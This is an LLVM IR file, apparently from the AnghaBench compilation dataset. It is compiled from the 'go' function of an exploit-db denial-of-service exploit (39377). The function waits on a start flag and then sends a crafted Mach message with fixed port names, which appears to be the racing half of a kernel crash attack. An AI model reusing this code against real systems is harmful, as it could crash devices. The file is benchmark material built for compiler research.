; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_39377.c_go.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/multiple/dos/extr_39377.c_go.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_3__ = type { i32, i32, i32, i8*, i8*, i32 }

@MACH_MSG_TYPE_COPY_SEND = common dso_local global i32 0, align 4
@start = common dso_local global i64 0, align 8
@MACH_SEND_MSG = common dso_local global i32 0, align 4
@MACH_PORT_NULL = common dso_local global i32 0, align 4
@MACH_MSG_TIMEOUT_NONE = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @go(i8* %0) #0 {
  %2 = alloca i8*, align 8
  %3 = alloca i8*, align 8
  %4 = alloca %struct.TYPE_3__, align 8
  store i8* %0, i8** %2, align 8
  store i8* inttoptr (i64 2819 to i8*), i8** %3, align 8
  %5 = bitcast %struct.TYPE_3__* %4 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %5, i8 0, i64 40, i1 false)
  %6 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 0
  store i32 40, i32* %6, align 8
  %7 = load i8*, i8** %3, align 8
  %8 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 4
  store i8* %7, i8** %8, align 8
  %9 = load i8*, i8** %3, align 8
  %10 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 3
  store i8* %9, i8** %10, align 8
  %11 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %12 = load i32, i32* @MACH_MSG_TYPE_COPY_SEND, align 4
  %13 = call i32 @MACH_MSGH_BITS(i32 %11, i32 %12)
  %14 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 2
  store i32 %13, i32* %14, align 8
  %15 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 1
  store i32 70, i32* %15, align 4
  br label %16

16:                                               ; preds = %19, %1
  %17 = load i64, i64* @start, align 8
  %18 = icmp eq i64 %17, 0
  br i1 %18, label %19, label %20

19:                                               ; preds = %16
  br label %16

20:                                               ; preds = %16
  %21 = call i32 @usleep(i32 1)
  %22 = load i32, i32* @MACH_SEND_MSG, align 4
  %23 = getelementptr inbounds %struct.TYPE_3__, %struct.TYPE_3__* %4, i32 0, i32 0
  %24 = load i32, i32* %23, align 8
  %25 = load i32, i32* @MACH_PORT_NULL, align 4
  %26 = load i32, i32* @MACH_MSG_TIMEOUT_NONE, align 4
  %27 = load i32, i32* @MACH_PORT_NULL, align 4
  %28 = call i32 @mach_msg(%struct.TYPE_3__* %4, i32 %22, i32 %24, i32 0, i32 %25, i32 %26, i32 %27)
  ret void
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #1

declare dso_local i32 @MACH_MSGH_BITS(i32, i32) #2

declare dso_local i32 @usleep(i32) #2

declare dso_local i32 @mach_msg(%struct.TYPE_3__*, i32, i32, i32, i32, i32, i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
